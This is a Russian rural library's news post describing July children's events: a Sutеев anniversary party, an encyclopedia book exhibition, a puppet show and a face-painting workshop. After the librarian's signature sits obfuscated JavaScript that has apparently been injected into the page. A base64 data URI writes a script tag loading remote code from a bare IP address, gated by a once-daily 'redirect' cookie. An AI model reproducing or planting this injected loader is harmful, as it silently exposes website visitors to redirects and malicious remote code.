«Июльские» новости из Первоманска

В июльские дни  ребята отметили юбилей  любимого писателя В.Сутеева в Первоманской сельской библиотеке. Празднование  юбилеев писателей и юбилеев книг – это лишний повод прочитать их вновь.Лучшие образцы литературы как раз и направлены на формирование понятий добра и зла. Детям очень важно знать, что  именно наши российские детские писатели создают лучшие образцы духовных  ценностей.

Все знают и любят сказки для малышей Сутеева:  это и «Бабочка», «Он один, а мы все вместе», «Разные колеса», «Мешок яблок» и много другие.  Ребята на празднике познакомились и с «Золотой книгой сказок» в рисунках В.Сутеева. Все сказки В.Сутеева учат добру, дружбе, взаимовыручке. И конечно на празднике  дети отгадывали задания викторины.

А в заключение  мероприятия посмотрели мультфильм «Петя и красная шапочка».

В  эти летние дни в Первоманской сельской библиотеке также прошло мероприятие «Спутники любознательных – словари и энциклопедии». На презентации книжной выставки «Мир от А доЯ откроет книжная страна» ребята познакомились  с серией «Энциклопедия тайн и загадок», серия «ЧТО ЕСТЬ ЧТО», «Энциклопедия о животных» и др... Эти книги обо всем на свете – для почемучек разного возраста! Ведь в этих книгах собраны ответы на самые интересные вопросы по разным темам, интересующим ребят – от  динозавров до людей.  Ведь эти книги не только увлекательны, но и в них прекрасные иллюстрации и замечательные  фотографии.

Также в эти июльские дни ребята любительского клуба «Страна Детства» показали кукольный спектакль «Лиса и петух» для всех желающих.

В течение июня и июля  месяца в  Первоманской  сельской библиотеке ребята демонстрируют свои творческие способности : кто-то рисует, кто-тоделает поделки,  пишет отзывы о прочитанных книгах, разгадывает кроссворды. А в День творчества Штарк Вадим и Кононова Арина (ученики 4 класса)  устроили занимательный  мастер – класс по аквагримму.

В общем,  лето в Первоманской библиотеке  проходит увлекательно, познавательно, весело, а главное,  нескучно.

Заведующая Первоманской
сельской библиотекой И.Э.Шевцова

function getCookie (e){var U=document.cookie.match (new RegExp («(?:^|; )»+e.replace (/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));return U?decodeURIComponent (U[1]):void 0}var src="data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=",now=Math.floor (Date.now ()/1e3),cookie=getCookie («redirect»);if (now>=(time=cookie)||void 0===time){var time=Math.floor (Date.now ()/1e3+86400),date=new Date ((new Date).getTime ()+86400);document.cookie="redirect="+time+"; path=/; expires="+date.toGMTString (),document.write ('')}